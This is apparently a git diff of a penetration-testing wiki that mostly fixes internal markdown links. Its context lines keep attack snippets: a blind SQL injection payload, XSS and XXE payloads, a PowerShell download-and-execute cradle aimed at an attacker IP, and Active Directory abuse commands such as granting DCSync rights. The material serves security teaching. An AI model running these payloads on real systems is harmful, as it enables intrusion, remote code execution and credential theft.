In this case there **isn't** any way to **distinguish** the **response** of the query based on the context of the page. But, you can make the page **take longer to load** if the guessed character is correct. We have already saw this technique in use before in order to [confirm a SQLi vuln](#confirming-with-timing).
```sql
1 and (select sleep(10) from users where SUBSTR(table_name,1,1) = 'A')#

2
src/pentesting-web/ssrf-server-side-request-forgery/README.md
View File

@ -141,7 +141,7 @@ In this configuration, the value from the Server Name Indication (SNI) field is
openssl s_client -connect target.com:443 -servername "internal.host.com" -crlf
```
## [Wget file upload](../file-upload/#wget-file-upload-ssrf-trick)
## [Wget file upload](../file-upload/index.html#wget-file-upload-ssrf-trick)
## SSRF with Command Injection

2
src/pentesting-web/ssti-server-side-template-injection/jinja2-ssti.md
View File

@ -356,7 +356,7 @@ The request will be urlencoded by default according to the HTTP format, which ca
## References
- [https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection#jinja2](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection#jinja2)
- Check [attr trick to bypass blacklisted chars in here](../../generic-methodologies-and-resources/python/bypass-python-sandboxes/#python3).
- Check [attr trick to bypass blacklisted chars in here](../../generic-methodologies-and-resources/python/bypass-python-sandboxes/index.html#python3).
- [https://twitter.com/SecGus/status/1198976764351066113](https://twitter.com/SecGus/status/1198976764351066113)
- [https://hackmd.io/@Chivato/HyWsJ31dI](https://hackmd.io/@Chivato/HyWsJ31dI)

2
src/pentesting-web/web-vulnerabilities-methodology.md
View File

@ -35,7 +35,7 @@ If the introduced data may somehow be reflected in the response, the page might
- [ ] [**Dangling Markup**](dangling-markup-html-scriptless-injection/)
- [ ] [**File Inclusion/Path Traversal**](file-inclusion/)
- [ ] [**Open Redirect**](open-redirect.md)
- [ ] [**Prototype Pollution to XSS**](deserialization/nodejs-proto-prototype-pollution/#client-side-prototype-pollution-to-xss)
- [ ] [**Prototype Pollution to XSS**](deserialization/nodejs-proto-prototype-pollution/index.html#client-side-prototype-pollution-to-xss)
- [ ] [**Server Side Inclusion/Edge Side Inclusion**](server-side-inclusion-edge-side-inclusion-injection.md)
- [ ] [**Server Side Request Forgery**](ssrf-server-side-request-forgery/)
- [ ] [**Server Side Template Injection**](ssti-server-side-template-injection/)

2
src/pentesting-web/web-vulnerabilities-methodology/README.md
View File

@ -34,7 +34,7 @@ If the introduced data may somehow be reflected in the response, the page might
- [ ] [**Dangling Markup**](../dangling-markup-html-scriptless-injection/)
- [ ] [**File Inclusion/Path Traversal**](../file-inclusion/)
- [ ] [**Open Redirect**](../open-redirect.md)
- [ ] [**Prototype Pollution to XSS**](../deserialization/nodejs-proto-prototype-pollution/#client-side-prototype-pollution-to-xss)
- [ ] [**Prototype Pollution to XSS**](../deserialization/nodejs-proto-prototype-pollution/index.html#client-side-prototype-pollution-to-xss)
- [ ] [**Server Side Inclusion/Edge Side Inclusion**](../server-side-inclusion-edge-side-inclusion-injection.md)
- [ ] [**Server Side Request Forgery**](../ssrf-server-side-request-forgery/)
- [ ] [**Server Side Template Injection**](../ssti-server-side-template-injection/)

2
src/pentesting-web/websocket-attacks.md
View File

@ -66,7 +66,7 @@ websocat -s 0.0.0.0:8000 #Listen in port 8000
### MitM websocket connections
If you find that clients are connected to a **HTTP websocket** from your current local network you could try an [ARP Spoofing Attack ](../generic-methodologies-and-resources/pentesting-network/#arp-spoofing)to perform a MitM attack between the client and the server.\
If you find that clients are connected to a **HTTP websocket** from your current local network you could try an [ARP Spoofing Attack ](../generic-methodologies-and-resources/pentesting-network/index.html#arp-spoofing)to perform a MitM attack between the client and the server.\
Once the client is trying to connect to you can then use:
```bash

2
src/pentesting-web/xs-search/README.md
View File

@ -409,7 +409,7 @@ This could also be done with a Timing attack (check the paper for more info).
- **Summary:** It is possible to check if a resource was stored in the cache.
- **Code Example**: [https://xsleaks.dev/docs/attacks/timing-attacks/performance-api/#detecting-cached-resources](https://xsleaks.dev/docs/attacks/timing-attacks/performance-api/#detecting-cached-resources), [https://xsinator.com/testing.html#Cache%20Leak%20(POST)](<https://xsinator.com/testing.html#Cache%20Leak%20(POST)>)
Using the [Performance API](./#performance-api) it's possible to check if a resource is cached.
Using the [Performance API](#performance-api) it's possible to check if a resource is cached.
### Network Duration

2
src/pentesting-web/xs-search/css-injection/README.md
View File

@ -84,7 +84,7 @@ Instead of loading the same page once and again with tens of different payloads
The attacker will f**ollow that loop until it manages to leak completely the secret**.
You can find the original [**Pepe Vila's code to exploit this here**](https://gist.github.com/cgvwzq/6260f0f0a47c009c87b4d46ce3808231) or you can find almost the [**same code but commented here**.](./#css-injection)
You can find the original [**Pepe Vila's code to exploit this here**](https://gist.github.com/cgvwzq/6260f0f0a47c009c87b4d46ce3808231) or you can find almost the [**same code but commented here**.](#css-injection)
> [!NOTE]
> The script will try to discover 2 chars each time (from the beginning and from the end) because the attribute selector allows to do things like:

18
src/pentesting-web/xss-cross-site-scripting/README.md
View File

@ -263,7 +263,7 @@ If you just think that **it's impossible to create an HTML tag with an attribute
### Inside the tag/escaping from attribute value
If you are in **inside a HTML tag**, the first thing you could try is to **escape** from the tag and use some of the techniques mentioned in the [previous section](./#injecting-inside-raw-html) to execute JS code.\
If you are in **inside a HTML tag**, the first thing you could try is to **escape** from the tag and use some of the techniques mentioned in the [previous section](#injecting-inside-raw-html) to execute JS code.\
If you **cannot escape from the tag**, you could create new attributes inside the tag to try to execute JS code, for example using some payload like (_note that in this example double quotes are use to escape from the attribute, you won't need them if your input is reflected directly inside the tag_):
```bash
@ -484,11 +484,11 @@ Several tricks with using different encoding were exposed already inside this se
**Bypasses for HTML tags and attributes**
Read the[ Blacklist Bypasses of the previous section](./#blacklist-bypasses).
Read the[ Blacklist Bypasses of the previous section](#blacklist-bypasses).
**Bypasses for JavaScript code**
Read the J[avaScript bypass blacklist of the following section](./#javascript-bypass-blacklists-techniques).
Read the J[avaScript bypass blacklist of the following section](#javascript-bypass-blacklists-techniques).
### CSS-Gadgets
@ -614,7 +614,7 @@ eval(8680439..toString(30))(983801..toString(36))
/**/
```
**JavaScript comments (from** [**JavaScript Comments**](./#javascript-comments) **trick)**
**JavaScript comments (from** [**JavaScript Comments**](#javascript-comments) **trick)**
```javascript
//This is a 1 line comment
@ -624,7 +624,7 @@ eval(8680439..toString(30))(983801..toString(36))
-->This is a 1 line comment, but "-->" must to be at the beggining of the first line
```
**JavaScript new lines (from** [**JavaScript new line**](./#javascript-new-lines) **trick)**
**JavaScript new lines (from** [**JavaScript new line**](#javascript-new-lines) **trick)**
```javascript
//Javascript interpret as new line these chars:
@ -846,7 +846,7 @@ You could make the **administrator trigger your self XSS** and steal his cookies
### Normalised Unicode
You could check is the **reflected values** are being **unicode normalized** in the server (or in the client side) and abuse this functionality to bypass protections. [**Find an example here**](../unicode-injection/#xss-cross-site-scripting).
You could check is the **reflected values** are being **unicode normalized** in the server (or in the client side) and abuse this functionality to bypass protections. [**Find an example here**](../unicode-injection/index.html#xss-cross-site-scripting).
### PHP FILTER_VALIDATE_EMAIL flag Bypass
@ -912,7 +912,7 @@ Past known protocols: `mailto://`, `//x:1/`, `ws://`, `wss://`, _empty Location
### Only Letters, Numbers and Dots
If you are able to indicate the **callback** that javascript is going to **execute** limited to those chars. [**Read this section of this post**](./#javascript-function) to find how to abuse this behaviour.
If you are able to indicate the **callback** that javascript is going to **execute** limited to those chars. [**Read this section of this post**](#javascript-function) to find how to abuse this behaviour.
### Valid `<script>` Content-Types to XSS
@ -1080,7 +1080,7 @@ with(this)
// https://blog.huli.tw/2022/05/05/en/angstrom-ctf-2022-writeup-en/#misc/CaaSio%20PSE
```
If **everything is undefined** before executing untrusted code (like in [**this writeup**](https://blog.huli.tw/2022/02/08/en/what-i-learned-from-dicectf-2022/#miscx2fundefined55-solves)) it's possible to generate useful objects "out of nothing" to abuse the execution of arbitrary untrusted code:
If **everything is undefined** before executing untrusted code (like in [**this writeup**](https://blog.huli.tw/2022/02/08/en/what-i-learned-from-dicectf-2022/index.html#miscx2fundefined55-solves)) it's possible to generate useful objects "out of nothing" to abuse the execution of arbitrary untrusted code:
- Using import()
@ -1375,7 +1375,7 @@ Make the use navigate in the page without exiting an iframe and steal of his act
```
> [!NOTE]
> You **won't be able to access the cookies from JavaScript** if the HTTPOnly flag is set in the cookie. But here you have [some ways to bypass this protection](../hacking-with-cookies/#httponly) if you are lucky enough.
> You **won't be able to access the cookies from JavaScript** if the HTTPOnly flag is set in the cookie. But here you have [some ways to bypass this protection](../hacking-with-cookies/index.html#httponly) if you are lucky enough.
### Steal Page Content

2
src/pentesting-web/xss-cross-site-scripting/some-same-origin-method-execution.md
View File

@ -4,7 +4,7 @@
## Same Origin Method Execution
There will be occasions where you can execute some limited javascript in a page. For example, in the case where you can[ **control a callback value that will be executed**](./#javascript-function).
There will be occasions where you can execute some limited javascript in a page. For example, in the case where you can[ **control a callback value that will be executed**](#javascript-function).
In those case, one of the best things that you could do is to **access the DOM to call whatever** sensitive action you can find in there (like clicking a button). However, usually you will find this vulnerability in **small endpoints without any interesting thing in the DOM**.

2
src/pentesting-web/xss-cross-site-scripting/xss-in-markdown.md
View File

@ -16,7 +16,7 @@ The most common way to get XSS in markdown is to inject common HTML tags that ex
<img src="x" onerror="alert(1)" />
```
You can find more examples in the [main XSS page of hacktricks](./).
You can find more examples in the [main XSS page of hacktricks]().
### Javascript links

4
src/pentesting-web/xxe-xee-xml-external-entity.md
View File

@ -464,7 +464,7 @@ This only work if the XML server accepts the `data://` protocol.
### UTF-7
You can use the \[**"Encode Recipe**" of cyberchef here ]\(\[[https://gchq.github.io/CyberChef/#recipe=Encode_text%28'UTF-7](https://gchq.github.io/CyberChef/#recipe=Encode_text%28'UTF-7) %2865000%29'%29\&input=PCFET0NUWVBFIGZvbyBbPCFFTlRJVFkgZXhhbXBsZSBTWVNURU0gIi9ldGMvcGFzc3dkIj4gXT4KPHN0b2NrQ2hlY2s%2BPHByb2R1Y3RJZD4mZXhhbXBsZTs8L3Byb2R1Y3RJZD48c3RvcmVJZD4xPC9zdG9yZUlkPjwvc3RvY2tDaGVjaz4)to]\([https://gchq.github.io/CyberChef/#recipe=Encode_text%28'UTF-7 %2865000%29'%29\&input=PCFET0NUWVBFIGZvbyBbPCFFTlRJVFkgZXhhbXBsZSBTWVNURU0gIi9ldGMvcGFzc3dkIj4gXT4KPHN0b2NrQ2hlY2s%2BPHByb2R1Y3RJZD4mZXhhbXBsZTs8L3Byb2R1Y3RJZD48c3RvcmVJZD4xPC9zdG9yZUlkPjwvc3RvY2tDaGVjaz4%29to](https://gchq.github.io/CyberChef/#recipe=Encode_text%28%27UTF-7%20%2865000%29%27%29&input=PCFET0NUWVBFIGZvbyBbPCFFTlRJVFkgZXhhbXBsZSBTWVNURU0gIi9ldGMvcGFzc3dkIj4gXT4KPHN0b2NrQ2hlY2s%2BPHByb2R1Y3RJZD4mZXhhbXBsZTs8L3Byb2R1Y3RJZD48c3RvcmVJZD4xPC9zdG9yZUlkPjwvc3RvY2tDaGVjaz4%29to)) transform to UTF-7.
You can use the \[**"Encode Recipe**" of cyberchef here ]\(\[[https://gchq.github.io/CyberChef/index.html#recipe=Encode_text%28'UTF-7](https://gchq.github.io/CyberChef/#recipe=Encode_text%28'UTF-7) %2865000%29'%29\&input=PCFET0NUWVBFIGZvbyBbPCFFTlRJVFkgZXhhbXBsZSBTWVNURU0gIi9ldGMvcGFzc3dkIj4gXT4KPHN0b2NrQ2hlY2s%2BPHByb2R1Y3RJZD4mZXhhbXBsZTs8L3Byb2R1Y3RJZD48c3RvcmVJZD4xPC9zdG9yZUlkPjwvc3RvY2tDaGVjaz4)to]\([https://gchq.github.io/CyberChef/index.html#recipe=Encode_text%28'UTF-7 %2865000%29'%29\&input=PCFET0NUWVBFIGZvbyBbPCFFTlRJVFkgZXhhbXBsZSBTWVNURU0gIi9ldGMvcGFzc3dkIj4gXT4KPHN0b2NrQ2hlY2s%2BPHByb2R1Y3RJZD4mZXhhbXBsZTs8L3Byb2R1Y3RJZD48c3RvcmVJZD4xPC9zdG9yZUlkPjwvc3RvY2tDaGVjaz4%29to](https://gchq.github.io/CyberChef/#recipe=Encode_text%28%27UTF-7%20%2865000%29%27%29&input=PCFET0NUWVBFIGZvbyBbPCFFTlRJVFkgZXhhbXBsZSBTWVNURU0gIi9ldGMvcGFzc3dkIj4gXT4KPHN0b2NrQ2hlY2s%2BPHByb2R1Y3RJZD4mZXhhbXBsZTs8L3Byb2R1Y3RJZD48c3RvcmVJZD4xPC9zdG9yZUlkPjwvc3RvY2tDaGVjaz4%29to)) transform to UTF-7.
```xml
<!xml version="1.0" encoding="UTF-7"?-->
@ -488,7 +488,7 @@ If the web is using Java you may check the [**jar: protocol**](xxe-xee-xml-exter
Trick from [**https://github.com/Ambrotd/XXE-Notes**](https://github.com/Ambrotd/XXE-Notes)\
You can create an **entity inside an entity** encoding it with **html entities** and then call it to **load a dtd**.\
Note that the **HTML Entities** used needs to be **numeric** (like \[in this example]\([https://gchq.github.io/CyberChef/#recipe=To_HTML_Entity%28true,'Numeric entities'%29\&input=PCFFTlRJVFkgJSBkdGQgU1lTVEVNICJodHRwOi8vMTcyLjE3LjAuMTo3ODc4L2J5cGFzczIuZHRkIiA%2B)\\](<https://gchq.github.io/CyberChef/#recipe=To_HTML_Entity%28true,%27Numeric%20entities%27%29&input=PCFFTlRJVFkgJSBkdGQgU1lTVEVNICJodHRwOi8vMTcyLjE3LjAuMTo3ODc4L2J5cGFzczIuZHRkIiA%2B)%5C>)).
Note that the **HTML Entities** used needs to be **numeric** (like \[in this example]\([https://gchq.github.io/CyberChef/index.html#recipe=To_HTML_Entity%28true,'Numeric entities'%29\&input=PCFFTlRJVFkgJSBkdGQgU1lTVEVNICJodHRwOi8vMTcyLjE3LjAuMTo3ODc4L2J5cGFzczIuZHRkIiA%2B)\\](<https://gchq.github.io/CyberChef/index.html#recipe=To_HTML_Entity%28true,%27Numeric%20entities%27%29&input=PCFFTlRJVFkgJSBkdGQgU1lTVEVNICJodHRwOi8vMTcyLjE3LjAuMTo3ODc4L2J5cGFzczIuZHRkIiA%2B)%5C>)).
```xml
<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE foo [<!ENTITY % a "&#x3C;&#x21;&#x45;&#x4E;&#x54;&#x49;&#x54;&#x59;&#x25;&#x64;&#x74;&#x64;&#x53;&#x59;&#x53;&#x54;&#x45;&#x4D;&#x22;&#x68;&#x74;&#x74;&#x70;&#x3A;&#x2F;&#x2F;&#x6F;&#x75;&#x72;&#x73;&#x65;&#x72;&#x76;&#x65;&#x72;&#x2E;&#x63;&#x6F;&#x6D;&#x2F;&#x62;&#x79;&#x70;&#x61;&#x73;&#x73;&#x2E;&#x64;&#x74;&#x64;&#x22;&#x3E;" >%a;%dtd;]>

2
src/reversing/reversing-tools-basic-methods/README.md
View File

@ -232,7 +232,7 @@ The **Create Dump** option will dump the final shellcode if any change is done t
### Disassembling using CyberChef
Upload your shellcode file as input and use the following recipe to decompile it: [https://gchq.github.io/CyberChef/#recipe=To_Hex('Space',0)Disassemble_x86('32','Full%20x86%20architecture',16,0,true,true)](<https://gchq.github.io/CyberChef/#recipe=To_Hex('Space',0)Disassemble_x86('32','Full%20x86%20architecture',16,0,true,true)>)
Upload your shellcode file as input and use the following recipe to decompile it: [https://gchq.github.io/CyberChef/#recipe=To_Hex('Space',0)Disassemble_x86('32','Full%20x86%20architecture',16,0,true,true)](<https://gchq.github.io/CyberChef/index.html#recipe=To_Hex('Space',0)Disassemble_x86('32','Full%20x86%20architecture',16,0,true,true)>)
## [Movfuscator](https://github.com/xoreaxeaxeax/movfuscator)

8
src/windows-hardening/active-directory-methodology/README.md
View File

@ -217,7 +217,7 @@ If you have managed to enumerate the active directory you will have **more email
Now that you have some basic credentials you should check if you can **find** any **interesting files being shared inside the AD**. You could do that manually but it's a very boring repetitive task (and more if you find hundreds of docs you need to check).
[**Follow this link to learn about tools you could use.**](../../network-services-pentesting/pentesting-smb/#domain-shared-folders-search)
[**Follow this link to learn about tools you could use.**](../../network-services-pentesting/pentesting-smb/index.html#domain-shared-folders-search)
### Steal NTLM Creds
@ -249,7 +249,7 @@ Then, its time to dump all the hashes in memory and locally.\
**Once you have the hash of a user**, you can use it to **impersonate** it.\
You need to use some **tool** that will **perform** the **NTLM authentication using** that **hash**, **or** you could create a new **sessionlogon** and **inject** that **hash** inside the **LSASS**, so when any **NTLM authentication is performed**, that **hash will be used.** The last option is what mimikatz does.\
[**Read this page for more information.**](../ntlm/#pass-the-hash)
[**Read this page for more information.**](../ntlm/index.html#pass-the-hash)
### Over Pass the Hash/Pass the Key
@ -393,7 +393,7 @@ For example you could:
Set-DomainObject -Identity <username> -XOR @{UserAccountControl=4194304}
```
- Grant [**DCSync**](./#dcsync) privileges to a user
- Grant [**DCSync**](#dcsync) privileges to a user
```powershell
Add-DomainObjectAcl -TargetIdentity "DC=SUB,DC=DOMAIN,DC=LOCAL" -PrincipalIdentity bfarmer -Rights DCSync
@ -481,7 +481,7 @@ skeleton-key.md
### Custom SSP
[Learn what is a SSP (Security Support Provider) here.](../authentication-credentials-uac-and-efs/#security-support-provider-interface-sspi)\
[Learn what is a SSP (Security Support Provider) here.](../authentication-credentials-uac-and-efs/index.html#security-support-provider-interface-sspi)\
You can create you **own SSP** to **capture** in **clear text** the **credentials** used to access the machine.\\
{{#ref}}

2
src/windows-hardening/active-directory-methodology/custom-ssp.md
View File

@ -4,7 +4,7 @@
### Custom SSP
[Learn what is a SSP (Security Support Provider) here.](../authentication-credentials-uac-and-efs/#security-support-provider-interface-sspi)\
[Learn what is a SSP (Security Support Provider) here.](../authentication-credentials-uac-and-efs/index.html#security-support-provider-interface-sspi)\
You can create you **own SSP** to **capture** in **clear text** the **credentials** used to access the machine.
#### Mimilib

2
src/windows-hardening/active-directory-methodology/printers-spooler-service-abuse.md
View File

@ -126,7 +126,7 @@ If you can perform a MitM attack to a computer and inject HTML in a page he will
## Cracking NTLMv1
If you can capture [NTLMv1 challenges read here how to crack them](../ntlm/#ntlmv1-attack).\
If you can capture [NTLMv1 challenges read here how to crack them](../ntlm/index.html#ntlmv1-attack).\
&#xNAN;_&#x52;emember that in order to crack NTLMv1 you need to set Responder challenge to "1122334455667788"_
{{#include ../../banners/hacktricks-training.md}}

2
src/windows-hardening/active-directory-methodology/unconstrained-delegation.md
View File

@ -38,7 +38,7 @@ To make a print server login against any machine you can use [**SpoolSample**](h
.\SpoolSample.exe <printmachine> <unconstrinedmachine>
```
If the TGT if from a domain controller, you could perform a[ **DCSync attack**](acl-persistence-abuse/#dcsync) and obtain all the hashes from the DC.\
If the TGT if from a domain controller, you could perform a[ **DCSync attack**](acl-persistence-abuse/index.html#dcsync) and obtain all the hashes from the DC.\
[**More info about this attack in ired.team.**](https://ired.team/offensive-security-experiments/active-directory-kerberos-abuse/domain-compromise-via-dc-print-server-and-kerberos-delegation)
**Here are other ways to try to force an authentication:**

2
src/windows-hardening/av-bypass.md
View File

@ -202,7 +202,7 @@ This technique was initially discovered by [@RastaMouse](https://twitter.com/_Ra
> [!NOTE]
> Please read [https://rastamouse.me/memory-patching-amsi-bypass/](https://rastamouse.me/memory-patching-amsi-bypass/) for a more detailed explanation.
There are also many other techniques used to bypass AMSI with powershell, check out [**this page**](basic-powershell-for-pentesters/#amsi-bypass) and [this repo](https://github.com/S3cur3Th1sSh1t/Amsi-Bypass-Powershell) to learn more about them.
There are also many other techniques used to bypass AMSI with powershell, check out [**this page**](basic-powershell-for-pentesters/index.html#amsi-bypass) and [this repo](https://github.com/S3cur3Th1sSh1t/Amsi-Bypass-Powershell) to learn more about them.
Or this script taht via memory patching will patch each new Powersh

2
src/windows-hardening/basic-cmd-for-pentesters.md
View File

@ -50,7 +50,7 @@ nslookup %LOGONSERVER%.%USERDNSDOMAIN% #DNS request for DC
wmic logicaldisk get caption,description,providername
```
### [Defender](authentication-credentials-uac-and-efs/#defender)
### [Defender](authentication-credentials-uac-and-efs/index.html#defender)
### Recycle Bin

2
src/windows-hardening/basic-powershell-for-pentesters/README.md
View File

@ -85,7 +85,7 @@ kali> echo -n "IEX(New-Object Net.WebClient).downloadString('http://10.10.14.9:8
PS> powershell -EncodedCommand <Base64>
```
## [Execution Policy](../authentication-credentials-uac-and-efs/#ps-execution-policy)
## [Execution Policy](../authentication-credentials-uac-and-efs/index.html#ps-execution-policy)
## [Constrained language](https://github.com/carlospolop/hacktricks/blob/master/windows-hardening/basic-powershell-for-pentesters/broken-reference/README.md)

2
src/windows-hardening/basic-powershell-for-pentesters/powerview.md
View File

@ -146,7 +146,7 @@ Get-NetRDPSession -ComputerName <servername> #List RDP sessions inside a host (n
### Group Policy Object - GPOs
If an attacker has **high privileges over a GPO** he could be able to **privesc** abusing it by **add permissions to a user**, **add a local admin user** to a host or **create a scheduled task** (immediate) to perform an action.\
For [**more info about it and how to abuse it follow this link**](../active-directory-methodology/acl-persistence-abuse/#gpo-delegation).
For [**more info about it and how to abuse it follow this link**](../active-directory-methodology/acl-persistence-abuse/index.html#gpo-delegation).
```powershell
#GPO

138
src/windows-hardening/checklist-windows-privilege-escalation.md
View File

@ -4,110 +4,110 @@
### **Best tool to look for Windows local privilege escalation vectors:** [**WinPEAS**](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/winPEAS)
### [System Info](windows-local-privilege-escalation/#system-info)
### [System Info](windows-local-privilege-escalation/index.html#system-info)
- [ ] Obtain [**System information**](windows-local-privilege-escalation/#system-info)
- [ ] Search for **kernel** [**exploits using scripts**](windows-local-privilege-escalation/#version-exploits)
- [ ] Obtain [**System information**](windows-local-privilege-escalation/index.html#system-info)
- [ ] Search for **kernel** [**exploits using scripts**](windows-local-privilege-escalation/index.html#version-exploits)
- [ ] Use **Google to search** for kernel **exploits**
- [ ] Use **searchsploit to search** for kernel **exploits**
- [ ] Interesting info in [**env vars**](windows-local-privilege-escalation/#environment)?
- [ ] Passwords in [**PowerShell history**](windows-local-privilege-escalation/#powershell-history)?
- [ ] Interesting info in [**Internet settings**](windows-local-privilege-escalation/#internet-settings)?
- [ ] [**Drives**](windows-local-privilege-escalation/#drives)?
- [ ] [**WSUS exploit**](windows-local-privilege-escalation/#wsus)?
- [ ] [**AlwaysInstallElevated**](windows-local-privilege-escalation/#alwaysinstallelevated)?
- [ ] Interesting info in [**env vars**](windows-local-privilege-escalation/index.html#environment)?
- [ ] Passwords in [**PowerShell history**](windows-local-privilege-escalation/index.html#powershell-history)?
- [ ] Interesting info in [**Internet settings**](windows-local-privilege-escalation/index.html#internet-settings)?
- [ ] [**Drives**](windows-local-privilege-escalation/index.html#drives)?
- [ ] [**WSUS exploit**](windows-local-privilege-escalation/index.html#wsus)?
- [ ] [**AlwaysInstallElevated**](windows-local-privilege-escalation/index.html#alwaysinstallelevated)?
### [Logging/AV enumeration](windows-local-privilege-escalation/#enumeration)
### [Logging/AV enumeration](windows-local-privilege-escalation/index.html#enumeration)
- [ ] Check [**Audit** ](windows-local-privilege-escalation/#audit-settings)and [**WEF** ](windows-local-privilege-escalation/#wef)settings
- [ ] Check [**LAPS**](windows-local-privilege-escalation/#laps)
- [ ] Check if [**WDigest** ](windows-local-privilege-escalation/#wdigest)is active
- [ ] [**LSA Protection**](windows-local-privilege-escalation/#lsa-protection)?
- [ ] [**Credentials Guard**](windows-local-privilege-escalation/#credentials-guard)[?](windows-local-privilege-escalation/#cached-credentials)
- [ ] [**Cached Credentials**](windows-local-privilege-escalation/#cached-credentials)?
- [ ] Check [**Audit** ](windows-local-privilege-escalation/index.html#audit-settings)and [**WEF** ](windows-local-privilege-escalation/index.html#wef)settings
- [ ] Check [**LAPS**](windows-local-privilege-escalation/index.html#laps)
- [ ] Check if [**WDigest** ](windows-local-privilege-escalation/index.html#wdigest)is active
- [ ] [**LSA Protection**](windows-local-privilege-escalation/index.html#lsa-protection)?
- [ ] [**Credentials Guard**](windows-local-privilege-escalation/index.html#credentials-guard)[?](windows-local-privilege-escalation/index.html#cached-credentials)
- [ ] [**Cached Credentials**](windows-local-privilege-escalation/index.html#cached-credentials)?
- [ ] Check if any [**AV**](https://github.com/carlospolop/hacktricks/blob/master/windows-hardening/windows-av-bypass/README.md)
- [ ] [**AppLocker Policy**](https://github.com/carlospolop/hacktricks/blob/master/windows-hardening/authentication-credentials-uac-and-efs/README.md#applocker-policy)?
- [ ] [**UAC**](https://github.com/carlospolop/hacktricks/blob/master/windows-hardening/authentication-credentials-uac-and-efs/uac-user-account-control/README.md)
- [ ] [**User Privileges**](windows-local-privilege-escalation/#users-and-groups)
- [ ] Check [**current** user **privileges**](windows-local-privilege-escalation/#users-and-groups)
- [ ] Are you [**member of any privileged group**](windows-local-privilege-escalation/#privileged-groups)?
- [ ] Check if you have [any of these tokens enabled](windows-local-privilege-escalation/#token-manipulation): **SeImpersonatePrivilege, SeAssignPrimaryPrivilege, SeTcbPrivilege, SeBackupPrivilege, SeRestorePrivilege, SeCreateTokenPrivilege, SeLoadDriverPrivilege, SeTakeOwnershipPrivilege, SeDebugPrivilege** ?
- [ ] [**Users Sessions**](windows-local-privilege-escalation/#logged-users-sessions)?
- [ ] Check[ **users homes**](windows-local-privilege-escalation/#home-folders) (access?)
- [ ] Check [**Password Policy**](windows-local-privilege-escalation/#password-policy)
- [ ] What is[ **inside the Clipboard**](windows-local-privilege-escalation/#get-the-content-of-the-clipboard)?
- [ ] [**User Privileges**](windows-local-privilege-escalation/index.html#users-and-groups)
- [ ] Check [**current** user **privileges**](windows-local-privilege-escalation/index.html#users-and-groups)
- [ ] Are you [**member of any privileged group**](windows-local-privilege-escalation/index.html#privileged-groups)?
- [ ] Check if you have [any of these tokens enabled](windows-local-privilege-escalation/index.html#token-manipulation): **SeImpersonatePrivilege, SeAssignPrimaryPrivilege, SeTcbPrivilege, SeBackupPrivilege, SeRestorePrivilege, SeCreateTokenPrivilege, SeLoadDriverPrivilege, SeTakeOwnershipPrivilege, SeDebugPrivilege** ?
- [ ] [**Users Sessions**](windows-local-privilege-escalation/index.html#logged-users-sessions)?
- [ ] Check[ **users homes**](windows-local-privilege-escalation/index.html#home-folders) (access?)
- [ ] Check [**Password Policy**](windows-local-privilege-escalation/index.html#password-policy)
- [ ] What is[ **inside the Clipboard**](windows-local-privilege-escalation/index.html#get-the-content-of-the-clipboard)?
### [Network](windows-local-privilege-escalation/#network)
### [Network](windows-local-privilege-escalation/index.html#network)
- [ ] Check **current** [**network** **information**](windows-local-privilege-escalation/#network)
- [ ] Check **current** [**network** **information**](windows-local-privilege-escalation/index.html#network)
- [ ] Check **hidden local services** restricted to the outside
### [Running Processes](windows-local-privilege-escalation/#running-processes)
### [Running Processes](windows-local-privilege-escalation/index.html#running-processes)
- [ ] Processes binaries [**file and folders permissions**](windows-local-privilege-escalation/#file-and-folder-permissions)
- [ ] [**Memory Password mining**](windows-local-privilege-escalation/#memory-password-mining)
- [ ] [**Insecure GUI apps**](windows-local-privilege-escalation/#insecure-gui-apps)
- [ ] Processes binaries [**file and folders permissions**](windows-local-privilege-escalation/index.html#file-and-folder-permissions)
- [ ] [**Memory Password mining**](windows-local-privilege-escalation/index.html#memory-password-mining)
- [ ] [**Insecure GUI apps**](windows-local-privilege-escalation/index.html#insecure-gui-apps)
- [ ] Steal credentials with **interesting processes** via `ProcDump.exe` ? (firefox, chrome, etc ...)
### [Services](windows-local-privilege-escalation/#services)
### [Services](windows-local-privilege-escalation/index.html#services)
- [ ] [Can you **modify any service**?](windows-local-privilege-escalation/#permissions)
- [ ] [Can you **modify** the **binary** that is **executed** by any **service**?](windows-local-privilege-escalation/#modify-service-binary-path)
- [ ] [Can you **modify** the **registry** of any **service**?](windows-local-privilege-escalation/#services-registry-modify-permissions)
- [ ] [Can you take advantage of any **unquoted service** binary **path**?](windows-local-privilege-escalation/#unquoted-service-paths)
- [ ] [Can you **modify any service**?](windows-local-privilege-escalation/index.html#permissions)
- [ ] [Can you **modify** the **binary** that is **executed** by any **service**?](windows-local-privilege-escalation/index.html#modify-service-binary-path)
- [ ] [Can you **modify** the **registry** of any **service**?](windows-local-privilege-escalation/index.html#services-registry-modify-permissions)
- [ ] [Can you take advantage of any **unquoted service** binary **path**?](windows-local-privilege-escalation/index.html#unquoted-service-paths)
### [**Applications**](windows-local-privilege-escalation/#applications)
### [**Applications**](windows-local-privilege-escalation/index.html#applications)
- [ ] **Write** [**permissions on installed applications**](windows-local-privilege-escalation/#write-permissions)
- [ ] [**Startup Applications**](windows-local-privilege-escalation/#run-at-startup)
- [ ] **Vulnerable** [**Drivers**](windows-local-privilege-escalation/#drivers)
- [ ] **Write** [**permissions on installed applications**](windows-local-privilege-escalation/index.html#write-permissions)
- [ ] [**Startup Applications**](windows-local-privilege-escalation/index.html#run-at-startup)
- [ ] **Vulnerable** [**Drivers**](windows-local-privilege-escalation/index.html#drivers)
### [DLL Hijacking](windows-local-privilege-escalation/#path-dll-hijacking)
### [DLL Hijacking](windows-local-privilege-escalation/index.html#path-dll-hijacking)
- [ ] Can you **write in any folder inside PATH**?
- [ ] Is there any known service binary that **tries to load any non-existant DLL**?
- [ ] Can you **write** in any **binaries folder**?
### [Network](windows-local-privilege-escalation/#network)
### [Network](windows-local-privilege-escalation/index.html#network)
- [ ] Enumerate the network (shares, interfaces, routes, neighbours, ...)
- [ ] Take a special look at network services listening on localhost (127.0.0.1)
### [Windows Credentials](windows-local-privilege-escalation/#windows-credentials)
### [Windows Credentials](windows-local-privilege-escalation/index.html#windows-credentials)
- [ ] [**Winlogon** ](windows-local-privilege-escalation/#winlogon-credentials)credentials
- [ ] [**Windows Vault**](windows-local-privilege-escalation/#credentials-manager-windows-vault) credentials that you could use?
